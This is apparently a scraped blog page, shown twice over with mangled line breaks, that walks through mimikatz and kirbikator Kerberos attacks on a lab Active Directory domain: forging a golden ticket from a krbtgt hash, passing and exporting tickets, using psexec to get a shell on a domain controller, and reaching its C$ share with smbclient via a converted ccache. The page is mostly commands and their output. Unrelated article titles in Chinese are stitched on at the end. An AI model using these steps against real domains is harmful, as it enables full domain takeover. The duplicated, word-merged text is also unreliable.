Kerberos Modules

1.   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct  9201500:33:13)

2.   .## ^ ##.

3.   ## / \ ##  /* * *

4.   ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

5.   '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)

6.    '#####'                                     with16 modules * * */

7. 

8. 

9.  mimikatz # kerberos::

10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !

11.

12.Module :        kerberos

13.Full name :     Kerberospackagemodule

14.Description :

15.

16.             ptt  -  Pass-the-ticket [NT 6]

17.            list  -  List ticket(s)

18.             tgt  -  Retrieve current TGT

19.           purge  -  Purge ticket(s)

20.          golden  -  WillyWonka factory

21.            hash  -  Hash password to keys

22.             ptc  -  Pass-the-ccache [NT6]

23.           clist  -  List tickets in MIT/Heimdall ccache

24.

25.mimikatz #

Golden Ticket

1.  mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-

2.  1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64

3.   /ticket:gold.kirbi

4.  User      : Administrator

5.  Domain    : sittingduck.info

6.  SID       : S-1-5-21-2792304509-1851296738-3446580569

7.  UserId   : 500

8.  GroupsId : *513512520518519

9.  ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt

10.Lifetime  : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5

11.4 PM

12.-> Ticket : gold.kirbi

13.

14. * PAC generated

15. * PAC signed

16. * EncTicketPart generated

17. * EncTicketPart encrypted

18. * KrbCred generated

19.

20.FinalTicketSaved to file !

Pass the Ticket

1.  mimikatz # kerberos::ptt gold.kirbi

2.    0 - File'gold.kirbi' : OK

3. 

4.  mimikatz # kerberos::list

5. 

6.  [00000000] - 0x00000017 - rc4_hmac_nt

7.     Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2

8.  02511:28:54 PM

9.     ServerName       : krbtgt/sittingduck.info @ sittingduck.info

10.   ClientName       : Administrator @ sittingduck.info

11.   Flags40e00000    : pre_authent ; initial ; renewable ; forwardable ;

12.

13.mimikatz #

Injecting tickets with Kirbikator

1.  C:\Users\notanadmin\Desktop>kirbikator.exe lsa gold.kirbi

2. 

3.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

4.   .## ^ ##.

5.   ## / \ ##  /* * *

6.   ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

7.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

8.    '#####'                                                     * * */

9. 

10.Destination : Microsoft LSA API (multiple)

11. < gold.kirbi (RFC KRB-CRED (#22))

12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf

13.o : injected

Exporting active tickets

1.  mimikatz # kerberos::list /export

2. 

3.  [00000000] - 0x00000012 - aes256_hmac

4.     Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

5.  511:39:31 PM

6.     ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

7.     ClientName       : uberuser @ SITTINGDUCK.INFO

8.     Flags60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ;

9.   forwardable ;

10.   * Saved to file     : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

11..INFO.kirbi

12.

13.[00000001] - 0x00000012 - aes256_hmac

14.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

15.511:39:31 PM

16.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

17.   ClientName       : uberuser @ SITTINGDUCK.INFO

18.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

19.orwardable ;

20.   * Saved to file     : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

21..INFO.kirbi

22.

23.[00000002] - 0x00000012 - aes256_hmac

24.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

25.511:39:31 PM

26.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

27.   ClientName       : uberuser @ SITTINGDUCK.INFO

28.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

29.ble ; forwardable ;

30.   * Saved to file     : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

31.CK.INFO.kirbi

32.

33.[00000003] - 0x00000012 - aes256_hmac

34.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

35.511:39:31 PM

36.   ServerName       : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO

37.   ClientName       : uberuser @ SITTINGDUCK.INFO

38.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

39.ble ; forwardable ;

40.   * Saved to file     : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU

41.CK.INFO.kirbi

42.

43.[00000004] - 0x00000012 - aes256_hmac

44.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

45.511:39:31 PM

46.   ServerName       : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.

47.INFO

48.   ClientName       : uberuser @ SITTINGDUCK.INFO

49.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

50.ble ; forwardable ;

51.   * Saved to file     : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu

52.ck.info-SITTINGDUCK.INFO.kirbi

PSEXEC with standard Kerberos tickets

1.  mimikatz # kerberos::list

2. 

3.  mimikatz # (EMPTY LIST)

4. 

5.  mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

6.  .INFO.kirbi

7.    0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'

8.  : OK

9. 

10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

11.CK.INFO.kirbi

12.  0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

13.' : OK

14.

15.mimikatz # kerberos::list

16.

17.[00000000] - 0x00000012 - aes256_hmac

18.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

19.511:39:31 PM

20.   ServerName       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO

21.   ClientName       : uberuser @ SITTINGDUCK.INFO

22.   Flags40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; f

23.orwardable ;

24.

25.[00000001] - 0x00000012 - aes256_hmac

26.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

27.511:39:31 PM

28.   ServerName       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO

29.   ClientName       : uberuser @ SITTINGDUCK.INFO

30.   Flags40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewa

31.ble ; forwardable ;

32.

33.mimikatz #

34.

35.

36.

37.C:\Users\notanadmin\Desktop>psexec \\dc1 cmd.exe

38.

39.PsExec v1.97 - Execute processes remotely

40.Copyright (C) 2001-2009MarkRussinovich

41.Sysinternals - www.sysinternals.com

42.

43.

44.MicrosoftWindows [Version6.3.9600]

45.(c) 2013MicrosoftCorporation. All rights reserved.

46.

47.C:\Windows\system32>whoami

48.sittingduck\uberuser

49.

50.C:\Windows\system32>echo %COMPUTERNAME%

51.DC1

52.

53.C:\Windows\system32>

Convert Mimikatz Kerberos ticket to CCache and use

1.  C:\Users\notanadmin\Desktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.

2.  sittingduck.info-SITTINGDUCK.INFO.kirbi"

3. 

4.    .#####.   KiRBikator1.0 (x86) release "Kiwi en C" (Feb  1201503:37:29)

5.   .## ^ ##.

6.   ## / \ ##  /* * *

7.   ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

8.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

9.    '#####'                                                     * * */

10.

11.Destination : MIT CredentialCache (simple)

12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB

13.-CRED (#22))

14. > Single file : uberuser@SITTINGDUCK.INFO.ccache

15.

16.C:\Users\notanadmin\Desktop>

Method 1

1.  KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$

2.  OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

3.  smb: \>

Method 2

1.  root@kali:~# apt-get install krb5-user

2.  Readingpackage lists... Done

3.  Building dependency tree

4.  Reading state information... Done

5.  The following extra packages will be installed:

6.    krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

7.  Suggested packages:

8.    krb5-doc

9.  The following NEW packages will be installed:

10.  krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

11.0 upgraded, 6 newly installed, 0 to remove and0not upgraded.

12.Need to get466 kB of archives.

13.Afterthis operation, 1,199 kB of additional disk space will be used.

14.Do you want to continue? [Y/n] y

15.0% [Connecting to http.kali.org]

16.<SNIP>

17.<SNIP>

18.<SNIP>

19.

20.root@kali:~/Desktop# klist

21.klist: Credentials cache file '/tmp/krb5cc_0'not found

22.root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0

23.root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$

24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

25.smb: \>

Kerberos Modules

1.   .#####.  
mimikatz 2.0 alpha (x64) release "Kiwi en
C" (Oct  9201500:33:13)

2.   .## ^ ##.

3.   ## / \ ## 
/* * *

4.   ## \ / ##  
Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

5.   '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)

6.    '#####'                                     with16 modules * * */

7. 

8. 

9.  mimikatz # kerberos::

10.ERROR
mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !

11.

12.Module :        kerberos

13.Full name :     Kerberospackagemodule

14.Description :

15.

16.             ptt  -  Pass-the-ticket [NT 6]

17.            list  -  List ticket(s)

18.             tgt  -  Retrieve current TGT

19.           purge  -  Purge ticket(s)

20.          golden  -  WillyWonka factory

21.            hash  -  Hash password to
keys

22.             ptc  -  Pass-the-ccache
[NT6]

23.           clist  -  List tickets in MIT/Heimdall ccache

24.

25.mimikatz #

Golden Ticket

1.  mimikatz #
kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-

2.  1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64

3.   /ticket:gold.kirbi

4.  User      : Administrator

5.  Domain    : sittingduck.info

6.  SID       : S-1-5-21-2792304509-1851296738-3446580569

7.  UserId   : 500

8.  GroupsId : *513512520518519

9.  ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt

10.Lifetime  : 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/202511:28:5

11.4 PM

12.-> Ticket : gold.kirbi

13.

14. * PAC generated

15. * PAC signed

16. * EncTicketPart generated

17. * EncTicketPart encrypted

18. * KrbCred generated

19.

20.FinalTicketSaved to file !

Pass the Ticket

1.  mimikatz # kerberos::ptt
gold.kirbi

2.    0 - File'gold.kirbi' : OK

3. 

4.  mimikatz # kerberos::list

5. 

6.  [00000000] - 0x00000017 - rc4_hmac_nt

7.     Start/End/MaxRenew: 10/26/201511:28:54 PM ; 10/23/202511:28:54 PM ; 10/23/2

8.  02511:28:54 PM

9.     ServerName       : krbtgt/sittingduck.info @
sittingduck.info

10.   ClientName       : Administrator @
sittingduck.info

11.   Flags40e00000    : pre_authent ; initial ; renewable ;
forwardable ;

12.

13.mimikatz #

Injecting
tickets with Kirbikator

1.  C:\Users\notanadmin\Desktop>kirbikator.exe
lsa gold.kirbi

2. 

3.    .#####.  
KiRBikator1.0 (x86) release "Kiwi en
C" (Feb  1201503:37:29)

4.   .## ^ ##.

5.   ## / \ ## 
/* * *

6.   ## \ / ##  
Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

7.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

8.    '#####'                                                    
* * */

9. 

10.Destination : Microsoft LSA API
(multiple)

11. < gold.kirbi (RFC KRB-CRED (#22))

12. > TicketAdministrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.inf

13.o : injected

Exporting active
tickets

1.  mimikatz # kerberos::list
/export

2. 

3.  [00000000] - 0x00000012 - aes256_hmac

4.     Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

5.  511:39:31 PM

6.     ServerName       : krbtgt/SITTINGDUCK.INFO @
SITTINGDUCK.INFO

7.     ClientName       : uberuser @ SITTINGDUCK.INFO

8.     Flags60a10000    : name_canonicalize ; pre_authent ;
renewable ; forwarded ;

9.   forwardable ;

10.   * Saved to file     : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

11..INFO.kirbi

12.

13.[00000001] - 0x00000012 - aes256_hmac

14.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

15.511:39:31 PM

16.   ServerName       : krbtgt/SITTINGDUCK.INFO @
SITTINGDUCK.INFO

17.   ClientName       : uberuser @ SITTINGDUCK.INFO

18.   Flags40e10000    : name_canonicalize ; pre_authent ; initial
; renewable ; f

19.orwardable ;

20.   * Saved to file     : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

21..INFO.kirbi

22.

23.[00000002] - 0x00000012 - aes256_hmac

24.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

25.511:39:31 PM

26.   ServerName       : cifs/dc1.sittingduck.info @
SITTINGDUCK.INFO

27.   ClientName       : uberuser @ SITTINGDUCK.INFO

28.   Flags40a50000    : name_canonicalize ; ok_as_delegate ;
pre_authent ; renewa

29.ble ;
forwardable ;

30.   * Saved to file     : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

31.CK.INFO.kirbi

32.

33.[00000003] - 0x00000012 - aes256_hmac

34.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

35.511:39:31 PM

36.   ServerName       : ldap/dc1.sittingduck.info @
SITTINGDUCK.INFO

37.   ClientName       : uberuser @ SITTINGDUCK.INFO

38.   Flags40a50000    : name_canonicalize ; ok_as_delegate ;
pre_authent ; renewa

39.ble ;
forwardable ;

40.   * Saved to file     : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDU

41.CK.INFO.kirbi

42.

43.[00000004] - 0x00000012 - aes256_hmac

44.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

45.511:39:31 PM

46.   ServerName       :
LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.

47.INFO

48.   ClientName       : uberuser @ SITTINGDUCK.INFO

49.   Flags40a50000    : name_canonicalize ; ok_as_delegate ;
pre_authent ; renewa

50.ble ;
forwardable ;

51.   * Saved to file     : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingdu

52.ck.info-SITTINGDUCK.INFO.kirbi

PSEXEC with
standard Kerberos tickets

1.  mimikatz # kerberos::list

2. 

3.  mimikatz # (EMPTY LIST)

4. 

5.  mimikatz # kerberos::ptt
1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK

6.  .INFO.kirbi

7.    0 - File'1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi'

8.  : OK

9. 

10.mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDU

11.CK.INFO.kirbi

12.  0 - File'2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

13.' : OK

14.

15.mimikatz # kerberos::list

16.

17.[00000000] - 0x00000012 - aes256_hmac

18.   Start/End/MaxRenew: 10/26/201511:39:31 PM ; 10/27/20159:39:31 AM ; 11/2/201

19.511:39:31 PM

20.   ServerName       : krbtgt/SITTINGDUCK.INFO @
SITTINGDUCK.INFO

21.   ClientName       : uberuser @ SITTINGDUCK.INFO

22.   Flags40e10000    : name_canonicalize ; pre_authent ; initial
; renewable ; f

23.orwardable ;

24.

25.[00000001] - 0x00000012 - aes256_hmac

26.   Start/End/MaxRenew: 10/26/201511:39:32 PM ; 10/27/20159:39:31 AM ; 11/2/201

27.511:39:31 PM

28.   ServerName       : cifs/dc1.sittingduck.info @
SITTINGDUCK.INFO

29.   ClientName       : uberuser @ SITTINGDUCK.INFO

30.   Flags40a50000    : name_canonicalize ; ok_as_delegate ;
pre_authent ; renewa

31.ble ;
forwardable ;

32.

33.mimikatz #

34.

35.

36.

37.C:\Users\notanadmin\Desktop>psexec
\\dc1 cmd.exe

38.

39.PsExec v1.97 - Execute processes
remotely

40.Copyright (C) 2001-2009MarkRussinovich

41.Sysinternals -
www.sysinternals.com

42.

43.

44.MicrosoftWindows [Version6.3.9600]

45.(c) 2013MicrosoftCorporation. All rights
reserved.

46.

47.C:\Windows\system32>whoami

48.sittingduck\uberuser

49.

50.C:\Windows\system32>echo
%COMPUTERNAME%

51.DC1

52.

53.C:\Windows\system32>

Convert Mimikatz
Kerberos ticket to CCache and use

1.  C:\Users\notanadmin\Desktop>kirbikator.exe
ccache "2-40a50000-uberuser@cifs~dc1.

2.  sittingduck.info-SITTINGDUCK.INFO.kirbi"

3. 

4.    .#####.  
KiRBikator1.0 (x86) release "Kiwi en
C" (Feb  1201503:37:29)

5.   .## ^ ##.

6.   ## / \ ## 
/* * *

7.   ## \ / ##  
Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

8.   '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)

9.    '#####'                                                    
* * */

10.

11.Destination : MIT CredentialCache (simple)

12. < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi
(RFC KRB

13.-CRED (#22))

14. > Single file :
uberuser@SITTINGDUCK.INFO.ccache

15.

16.C:\Users\notanadmin\Desktop>

Method 1

1.  KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache
smbclient -k //dc1.sittingduck.info/c$

2.  OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

3.  smb: \>

Method 2

1.  root@kali:~#
apt-get install krb5-user

2.  Readingpackage lists... Done

3.  Building dependency
tree

4.  Reading state
information... Done

5.  The following extra
packages will be installed:

6.    krb5-config libgssrpc4 libkadm5clnt-mit9
libkadm5srv-mit9 libkdb5-7

7.  Suggested packages:

8.    krb5-doc

9.  The following NEW
packages will be installed:

10.  krb5-config krb5-user libgssrpc4
libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7

11.0 upgraded, 6 newly
installed, 0 to remove and0not upgraded.

12.Need to get466 kB of archives.

13.Afterthis operation, 1,199 kB of
additional disk space will be used.

14.Do you want to continue? [Y/n] y

15.0% [Connecting to
http.kali.org]

16.<SNIP>

17.<SNIP>

18.<SNIP>

19.

20.root@kali:~/Desktop# klist

21.klist: Credentials cache file '/tmp/krb5cc_0'not found

22.root@kali:~/Desktop# cp
uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0

23.root@kali:~/Desktop#
smbclient -k //dc1.sittingduck.info/c$

24.OS=[WindowsServer2012 R2 Standard9600] Server=[WindowsServer2012 R2 Standard6.3]

25.smb: \>

标签: mimikatzkerberos

mimikazhi Kerberos Modules的更多相关文章

  1. Kerberos是怎么工作的?

    Kerberos是一种计算机网络授权协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证. 采用客户端/服务器结构,并且能够进行相互认证,即客户端和服务器端均可对对方进行身份认证. 关键要素 ...

  2. Centos 7 集成安装Apache+PHP+Kerberos+LDAP+phpLDAPadmin

    一.安装Apache 1.1.安装Apache Apache程序是目前拥有很高市场占有率的Web服务程序之一,其跨平台和安全性广泛被认可且拥有快速.可靠.简单的API扩展. 它的名字取自美国印第安人土 ...

  3. Kerberos简介

    Kerberos协议: Kerberos协议主要用于计算机网络的身份鉴别(Authentication), 其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的票据(ticket-grantin ...

  4. Play modules

    A Play application can be assembled from several application modules. This allows you to reuse appli ...

  5. [Kerberos] Java client访问kerberos-secured cluster

    使用java client访问kerberos-secured cluster,最重要的是先从admin那里拿到可用的keytab文件,用来作认证.接下来就是调整连接的配置.以下先用连接hdfs为例进 ...

  6. [Kerberos] Kerberos 认证过程整理

    Kerberos是一种安全认证协议,意在提供 more secure authentication simplified management of password convenience of s ...

  7. [Kerberos] User Ticket Management

    Kerberos客户端常用命令包括 kinit, klist, kdestroy, and kpasswd,用户使用这些命令管理自己的 ticket. 此外,每台运行Kerberos的机器应该都配置/ ...

  8. YII的Modules模块化

    转载来源: http://blog.csdn.net/mengxiangbaidu/article/details/7041296 http://blog.csdn.net/colzer/articl ...

  9. Kerberos

    一.Kerberos Concept Kerberos是一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务,为通信双方提供双向身份认证. Kerberos关键术语: ...

随机推荐

  1. 脚本处理iOS的Crash日志

    背景 当我们打包app时,可以选择生成对应的符号表,其保存 16 进制函数地址映射信息,通过给定的函数起始地址和偏移量,可以对应函数具体信息以供分析. 所以我们拿到测试给的闪退日志(.crash)时, ...

  2. 自动分配ip的方法- 【Linux】

    1.  查看本机无线网络使用的网卡 2.  设置vbox的网络连接为桥接,并选择本机无线网络对应的网卡 3.  进入系统,输入ifconfig命令,记录下系统的HWaddr 4.  修改系统ip配置文 ...

  3. 学员管理系统(SQLAlchemy 实现)

    一.业务逻辑 二.设计表结构 三.代码结构 start.py import os, sys sys.path.insert(0, os.path.dirname(os.path.dirname(os. ...

  4. Python参数传递,既不是传值也不是传引用

    面试的时候,有没有被问到Python传参是传引用还是传值这种问题?有没有听到过Python传参既不是传值也不是传引用这种说法?一个小小的参数默认值也可能让代码出现难以查找的bug? 如果你也遇到过上面 ...

  5. roadhog中如何拷贝文件

    一:使用 public 目录 我们约定 public 目录下的文件会在 server 和 build 时被自动 copy 到输出目录(默认是 ./dist)下.所以可以在这里存放 favicon, i ...

  6. 局域网传输-LED灯搭建局域网:数据传输可达每秒3Gb

    一 : LED灯搭建局域网:数据传输可达每秒3Gb 我们之前介绍了利用可见光通讯技术,通过LED灯光实现精准室内定位的例子.实际上,这种灯泡和技术的用途不止于此,比如,它还能进行无线网络传输. 最近, ...

  7. 初步认识CNN

    1.机器学习 (1)监督学习:有数据和标签 (2)非监督学习:只有数据,没有标签 (3)半监督学习:监督学习+非监督学习 (4)强化学习:从经验中总结提升 (5)遗传算法:适者生存,不适者淘汰 2.神 ...

  8. Daily Scrum7 11.11

    今日任务: 徐钧鸿:结束了SQL和Affairs的移植,修改了连接池,学习C#和java的正则表达式并且完成相关的移植 张艺:个人阅读作业 黄可嵩:完成高亮显示的移植,进一步移植搜索代码 徐方宇:继续 ...

  9. 团队冲刺——Five

    昨天: 司宇航:web项目如何部署到公网,把网址做成桌面图标链接,登录记住密码功能. 王金萱:注册和登录界面,用户数据库的信息录入. 马佳慧:做界面. 季方:处理爬虫数据,实现统计功能. 遇到的问题: ...

  10. 现代软件工程构建之法 前五章阅读感想&困惑

    第一章 第一节 新时代中国的IT产业市场规则不规范,书中提到社会上有个别软件公司的软件一定要卸载别家公司的软件才能运行,我这里感到疑惑---————是不是说如果 一间软件公司他能做出一个像微软操作系统 ...